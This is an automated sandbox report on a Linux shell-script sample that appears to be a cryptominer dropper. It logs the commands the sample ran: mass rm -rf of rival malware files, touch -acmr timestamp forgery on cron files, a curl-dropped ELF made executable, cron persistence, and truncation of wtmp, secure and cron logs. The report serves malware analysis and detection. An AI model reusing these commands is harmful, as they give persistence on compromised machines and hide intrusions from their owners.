Source: /bin/bash (PID: 11046)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 11079)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 11119)Ps executable: /bin/ps -> ps auxf
Source: /bin/bash (PID: 12711)Ps executable: /bin/ps -> ps -fe
Source: /bin/bash (PID: 12721)Ps executable: /bin/ps -> ps axf -o "pid %cpu"
Executes the "rm" command used to delete files or directories
Source: /bin/bash (PID: 9366)Rm executable: /bin/rm -> rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
Source: /bin/bash (PID: 9370)Rm executable: /bin/rm -> rm -rf /boot/grub/deamon
Source: /bin/bash (PID: 9379)Rm executable: /bin/rm -> rm -rf /boot/grub/disk_genius
Source: /bin/bash (PID: 9385)Rm executable: /bin/rm -> rm -rf /tmp/*index_bak*
Source: /bin/bash (PID: 9391)Rm executable: /bin/rm -> rm -rf /tmp/*httpd.conf*
Source: /bin/bash (PID: 9397)Rm executable: /bin/rm -> rm -rf /tmp/*httpd.conf
Source: /bin/bash (PID: 9404)Rm executable: /bin/rm -> rm -rf /tmp/a7b104c270
Source: /bin/bash (PID: 10234)Rm executable: /bin/rm -> rm -rf /var/tmp/j*
Source: /bin/bash (PID: 10241)Rm executable: /bin/rm -> rm -rf /tmp/j*
Source: /bin/bash (PID: 10248)Rm executable: /bin/rm -> rm -rf /var/tmp/java
Source: /bin/bash (PID: 10255)Rm executable: /bin/rm -> rm -rf /tmp/java
Source: /bin/bash (PID: 10262)Rm executable: /bin/rm -> rm -rf /var/tmp/java2
Source: /bin/bash (PID: 10269)Rm executable: /bin/rm -> rm -rf /tmp/java2
Source: /bin/bash (PID: 10276)Rm executable: /bin/rm -> rm -rf /var/tmp/java*
Source: /bin/bash (PID: 10283)Rm executable: /bin/rm -> rm -rf /tmp/java*
Source: /bin/bash (PID: 10290)Rm executable: /bin/rm -> rm -rf /tmp/httpd.conf
Source: /bin/bash (PID: 10297)Rm executable: /bin/rm -> rm -rf /tmp/conn
Source: /bin/bash (PID: 10304)Rm executable: /bin/rm -> rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas
Source: /bin/bash (PID: 10311)Rm executable: /bin/rm -> rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
Source: /bin/bash (PID: 10329)Rm executable: /bin/rm -> rm -rf /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-* .systemd-private-*
Source: /bin/bash (PID: 10360)Rm executable: /bin/rm -> rm -rf /etc/rc*.d/S01nfstruncate /etc/rc.d/rc*.d/S01nfstruncate
Source: /bin/bash (PID: 10380)Rm executable: /bin/rm -> rm -rf /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /etc/rc*.d/S01acpidtd /etc/ld.sc.conf
Source: /bin/bash (PID: 12695)Rm executable: /bin/rm -> rm -rf /etc/ld.so.preload
Executes the "touch" command used to create files or modify time stamps
Source: /bin/bash (PID: 10395)Touch executable: /bin/touch -> touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
Source: /bin/bash (PID: 12106)Touch executable: /bin/touch -> touch -acmr /bin/sh /usr/local/bin/dns
Source: /bin/bash (PID: 12111)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/crontab
Source: /bin/bash (PID: 12117)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/root
Source: /bin/bash (PID: 12133)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/apache
Source: /bin/bash (PID: 12148)Touch executable: /bin/touch -> touch -acmr /bin/sh /var/spool/cron/root
Source: /bin/bash (PID: 12169)Touch executable: /bin/touch -> touch -acmr /bin/sh /var/spool/cron/crontabs/root
Source: /bin/bash (PID: 12697)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.hourly/oanacroner
Source: /bin/bash (PID: 12699)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.daily/oanacroner
Source: /bin/bash (PID: 12702)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.monthly/oanacroner
Reads system information from the proc file system
Source: /bin/bash (PID: 9334)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10417)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10417)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10464)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10464)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10498)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10498)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10541)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10541)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10577)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10577)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10614)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10614)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10649)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10649)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10675)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10675)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10712)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10712)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10742)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10742)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10773)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10773)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10808)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10808)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10839)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10839)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10870)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10870)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10906)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10906)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10944)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10944)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 10980)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 10980)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 11016)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 11016)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 11046)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 11046)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 11079)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 11079)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 11119)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 11119)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 12711)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 12711)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 12721)Reads from proc file: /proc/meminfo
Sample tries to set the executable flag
Source: /bin/chmod (PID: 12103)File: /usr/local/bin/dns (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 12391)File: /etc/cron.hourly/oanacroner (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 12530)File: /etc/cron.daily/oanacroner (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 12694)File: /etc/cron.monthly/oanacroner (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 13008)File: /tmp/r1x (bits: - usr: rx grp: rx all: rwx)
Writes ELF files to disk
Source: /bin/curl (PID: 12765)File written: /tmp/r1x
Writes crontab-like entries to files under /var or /etc, typically to achieve persistence
Source: /bin/bash (PID: 9334)Crontab like entry written: /etc/crontab
Sample's exit code indicates no error despite standard error output
Source: submitted sampleStderr: chattr: No such file or directory while trying to stat /tmp/kworkerds
chattr: No such file or directory while trying to stat /var/tmp/kworkerds
chattr: No such file or directory while trying to stat /var/tmp/config.json
chattr: No such file or directory while trying to stat /tmp/.systemd-private-*
chattr: No such file or directory while trying to stat /usr/lib/libiacpkmn.so.3
chattr: No such file or directory while trying to stat /etc/init.d/nfstruncate
chattr: No such file or directory while trying to stat /bin/nfstruncate
chattr: No such file or directory while trying to stat /bin/ddus-uidgen
chattr: No such file or directory while trying to stat /etc/init.d/acpidtd
chattr: No such file or directory while trying to stat /etc/rc.d/rc*.d/S01acpidtd
chattr: No such file or directory while trying to stat /etc/rc*.d/S01acpidtd
chattr: No such file or directory while trying to stat /etc/ld.sc.conf
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
/tmp/pcXrXrdEB2: line 121: rep: command not found
grep: write error
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).
Usage: kill [options]
<pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output 
version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).Usage: kill [options] <pid|name> [...]Options: -a; --all do not restrict the name-to-pid conversion to processes with the same uid as the present process -s; --signal <sig> send specified signal -q; --queue <sig> use sigqueue(2) rather than kill(2) -p; --pid print pids without signaling them -l; --list [=<signal>] list signal names; or convert one to a name -L; --table list signal names and numbers -h; --help display this help and exit -V; --version output version information and exitFor more details see kill(1).chattr: No such file or directory while trying to stat /usr/local/bin/dnschattr: No such file or directory while trying to stat /etc/cron.d/rootchattr: No such file or directory while trying to stat /etc/cron.d/apachechattr: No such file or directory while trying to stat /var/spool/cron/rootchattr: No such file or directory while trying to stat /var/spool/cron/crontabs/rootchattr: No 
such file or directory while trying to stat /etc/ld.so.preload: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Drops files with innocent-looking names
Source: /bin/bash (PID: 9334) Path: /etc/cron.d/apache

Malware Analysis System Evasion:

Deletes security-related log files
Source: /bin/bash (PID: 9334) Truncated file: /var/log/wtmp
Source: /bin/bash (PID: 9334) Truncated file: /var/log/secure
Source: /bin/bash (PID: 9334) Truncated file: /var/log/cron
Deletes log files
Source: /bin/bash (PID: 9334) Truncated file: /var/log/wtmp
Source: /bin/bash (PID: 9334) Truncated file: /var/log/secure
Source: /bin/bash (PID: 9334) Truncated file: /var/log/cron
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Source: /bin/bash (PID: 13010) Sleep executable: /bin/sleep -> sleep 5
Reads CPU information from /sys indicative of miner or evasive malware
Source: /bin/pkill (PID: 9338) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9350) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9411) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9419) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9431) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9454) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9463) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9482) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9490) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9502) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9527) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9546) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9571) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9578) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9585) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9604) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9630) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9654) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9660) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9671) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9677) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9704) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9711) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9723) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9732) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9739) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9754) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9779) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9794) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9808) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9817) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9832) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9837) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9845) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9852) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9871) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9882) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9903) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9923) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9930) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9937) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9944) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9962) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9969) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9979) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9992) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10000) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10017) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10030) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10044) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10051) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10063) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10071) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10090) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10108) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10126) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10133) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10144) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10153) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10160) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10167) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10175) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10194) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10202) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10221) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/r1x (PID: 13009) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/lib/polkit-1/polkitd (PID: 9953) Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /bin/bash (PID: 9334) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9338) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9350) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9411) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9419) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9431) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9454) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9463) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9482) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9490) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9502) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9527) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9546) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9571) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9578) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9585) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9604) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9630) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9654) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9660) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9671) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9677) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9704) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9711) Queries kernel information via 'uname':
